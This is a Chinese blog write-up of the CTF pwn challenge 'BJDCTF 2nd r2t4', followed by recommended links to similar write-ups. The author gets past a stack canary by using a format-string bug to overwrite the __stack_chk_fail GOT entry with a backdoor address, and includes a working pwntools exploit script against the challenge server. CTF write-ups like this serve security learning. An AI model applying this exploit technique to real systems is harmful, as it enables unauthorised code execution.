[BUUCTF-pwn]——[BJDCTF 2nd]r2t4

最新推荐文章于 2022-05-01 20:10:44 发布
最新推荐文章于 2022-05-01 20:10:44 发布
阅读量177 收藏
点赞数
分类专栏: # BUUCTF # 格式化字符串
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Y_peak/article/details/113934330
版权

[BUUCTF-pwn]——[BJDCTF 2nd]r2t4

checksec一下,看一下。
在这里插入图片描述
IDA中,发现了后面函数和格式化字符串漏洞。
在这里插入图片描述
在这里插入图片描述
找到后门函数的地址, 并且算格式化字符串的偏移
在这里插入图片描述
在这里插入图片描述

思路

开启了canary保护,我们想要执行我们想要执行的代码, 可以通过触发canary保护, 进而触发__stack_chk_fail函数,执行。我们将got表地址改为我们想要执行的地址就可以了。
fmtstr_payload是pwntools继承的一个模板,可以用来直接修改地址

exploit

from pwn import *
context(arch='amd64',os='linux',word_size='64')
backdoor = 0x0000000000400626
p = remote("node3.buuoj.cn",25583)
elf = ELF('./r2t4')
__stack_chk_fail = elf.got['__stack_chk_fail']

payload = fmtstr_payload(6, {__stack_chk_fail:backdoor}).ljust(0x38, 'a')
p.sendline(payload)
p.interactive()
Y-peak
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BJDCTF-PWN r2t4详解
weixin_44864859的博客
03-26 1016
BJDCTF_r2t4 考点:用格式化字符串写__stack_chk_fail 函数来 bypass canary 由于涉及到格式化字符串漏洞的利用,所以基本原理和利用方法要先有一定的了解。推荐先阅读CTF-wiki: 格式化字符串漏洞原理介绍 格式化字符串漏洞利用 1.首先检查程序的基础信息 64位程序,可以看到开启了NX和Stack防护 2.运行程序,对程序功能有基本了解 程序基本功能:对...
BUUCTF-PWN刷题日记(二)
weixin_45461609的博客
05-15 307
BUUCTF-PWN刷题日记ciscn_2019_n_8not_the_same_3dsctf_2016 ciscn_2019_n_8 送分题… ''' Author:3nc0de Date:2020/05/15 ''' from pwn import * r = process('./pwn') #r = remote('node3.buuoj.cn', port) payload=p32(0x11)*14 r.sendline(payload) r.interactive() not_the
如何在IDA软件中找到自己需要的目标函数(关键函数)
半岛铁盒的博客
11-30 1万+
这个问题很困扰我们这些初学者 特此记录~~~ 一. 提前要记住IDA的基操~~ 1.shift+F12 查看string信息 (通常可以看到重要的信息 ) 2.Alt + T 查找带有目标字符串的函数 3. F5 查看 C代码 4. Ctrl + F 在函数框中 搜索函数 5. 空格键 流程图与代码 来回切换. 二.讲解 从题目下下载好附件后在IDA中打开,发现没有main函数(即关键代码所在的函数); 这时候我们按 Ctrl + F12 看到了flag, wrong, 但是发现了一个
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 396
buuctf-pwn 001-016题wp
[BUUCTF]PWN——[BJDCTF 2nd]r2t4
mcmuyanga的博客
10-31 387
[BJDCTF 2nd]r2t4 附件 步骤 例行检查,64位,开启了canary和nx 64位ida载入,检索字符串的时候发现了后面函数,shell_addr=0x400626 main函数 可以溢出0x8字节,输出点存在格式化字符串漏洞 https://blog.csdn.net/weixin_44864859/article/details/105129673?utm_medium=distribute.pc_relevant.none-task-blog-BlogCommendFromMac
buuctf gyctf_2020_borrowstack(栈迁移)和r2t4,axb_2019_fmt32(格式化字符串和fmtstr_payload工具的使用)
carol2358的博客
05-24 1334
头痛,之前栈学的漏洞好多,只学了相关知识没有做题,真正碰到题目就不会了,真的头痛 gyctf_2020_borrowstack 栈迁移 payload设置 此种攻击方法的关键在于如何同时控制ebp和eip,那么如何同时控制ebp和eip的值的? 1、使用ROPgadget查找leave;ret指令所在的地址 2、覆盖完成bufer后,使用可控制的地址覆盖ebp的值,使用上述leave;ret指令所在地址覆盖ret的值。 程序运行(32位,64位同理): 1、当函数正常返回时,执行leave;re
CTF-Pwn-[BJDCTF 2nd]rci
01-09
CTF-Pwn-[BJDCTF 2nd]rci 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 ...
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
BUUCTF(pwn)hgame2018_flag_server(简单的栈溢出)
半岛铁盒的博客
04-05 319
这一题主要就分析清楚程序的执行流程就可以做出来了; v10=1就可以得出答案; 由于v5=-1;输入长度可以很大,造成溢出,点进去s1 溢出覆盖到v10 满足条件 from pwn import* p = remote("node3.buuoj.cn",26244) p.sendlineafter("your username length: ",'-1') payload='a'*0x40+p32(1) p.sendlineafter("whats your username?",payload.
buuoj Pwn writeup 206-210
yongbaoii的博客
08-31 457
206 ciscn_2019_c_3 一堆乱七八糟。 create 207 metasequoia_2020_summoner 208 linkctf_2018.7_babypie 209 wdb_2018_3rd_pesp 210 TWCTF_online_2019_asterisk_alloc
【BUUCTF - PWN】ciscn_2019_n_1
古月浪子的博客
03-19 3570
checksec一下 IDA打开,发现如果满足的条件达成,就能get flag 找到栈溢出漏洞,输入可以覆盖到v2 写代码把11.28125在内存中的十六进制表示出来 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' ...
[BJDCTF 2nd] r2t4
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-24 843
题目下载地址:点此下载 查保护 此处存在格式化字符串漏洞 利用格式化字符串漏洞复写got表中的__stack_chk_fail地址,这个函数的作用是,当程序出现栈溢出的时候执行此函数,利用格式化字符串漏洞把这个函数的got表地址覆盖为后门函数 EXP: from pwn import * context(arch='amd64',os='linux',word_size='64') #p...
buuctf pwn wp(第四波)格式化字符串漏洞系列
月阴荒的博客
04-04 3183
这里是一个总的分类,一个类型的第一道题目会详细介绍,后面的类型相同的会简略介绍(不过这是第一波,都是最简单的,原理可以看我前面的文章,后面难一点的题目我再讲原理。) 这一波题都是无脑AAAA的类型,它们的区别主要就是打入多少个填充字符A的区别,(还有接受到什么字符串的区别),反正都是最简单的一类题。 另外声明,脚本有些来自于网络上,但是我做了有一会儿了(这篇文章是我把当初做了时的记录素材拿过来做的...
什么是私有地址?如何分类?
热门推荐
qq_44047479的博客
10-30 2万+
什么是私有地址?如何分类? 在现在的网络中,IP地址分为公网IP地址和私有IP地址。 公网IP是在Internet使用的IP地址,而私有IP地址则是在局域网中使用的IP地址。 私有IP地址是一段保留的IP地址。只使用在局域网中,无法在Internet上使用。 当私有网络内的主机要与位于公网上的主机进行通讯时必须经过地址转换,将其私有地址转换为合法公网地址才能对外访问。 NAT-Network Address Translation 网络地址转换 所谓的私有地址就是在互联网上不使用,而被用在局域网络中的地址
BUUCTF-[Black Watch 入群题]PWN
Fzuim的博客
04-14 373
常规检查下来,发现可以进行栈溢出,但是允许操作的空间只有8个字节… 看下ida伪代码 可操作空间很小,只能覆盖到eip,正常思路是:泄露write的got表地址,然后通过libcsearch找出system和bin/sh的地址,再次构造栈溢出攻击。此题目栈溢出只能操作8字节,一般思路行不通。此时就用到另一个概念:栈迁移!!! 栈迁移的关键点在于esp,能把esp重新指向另外一块内存空间,即可成功。这题的另一块内存空间就是bss段。 利用到栈迁移,我们需要在原本栈的eip位置覆盖成 leave;r.
[BUUCTF-pwn]——pwnable_orw   (ORW)
Y_peak的博客
03-16 1145
[BUUCTF-pwn]——pwnable_orw 第一次碰到orw的问题,所谓orw就是指你的系统调用被禁止了,不能通过子进程去获得权限和flag,只能在该进程通过 open , read ,write来得到flag 这个时候可以通过seccomptools,来查看 注意看到prctl就是将系统调用给你禁止了 exploit from pwn import * context.arch = 'i386' p = remote('node3.buuoj.cn',28626) shellcode = she
mqtt-pwn安装
最新发布
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值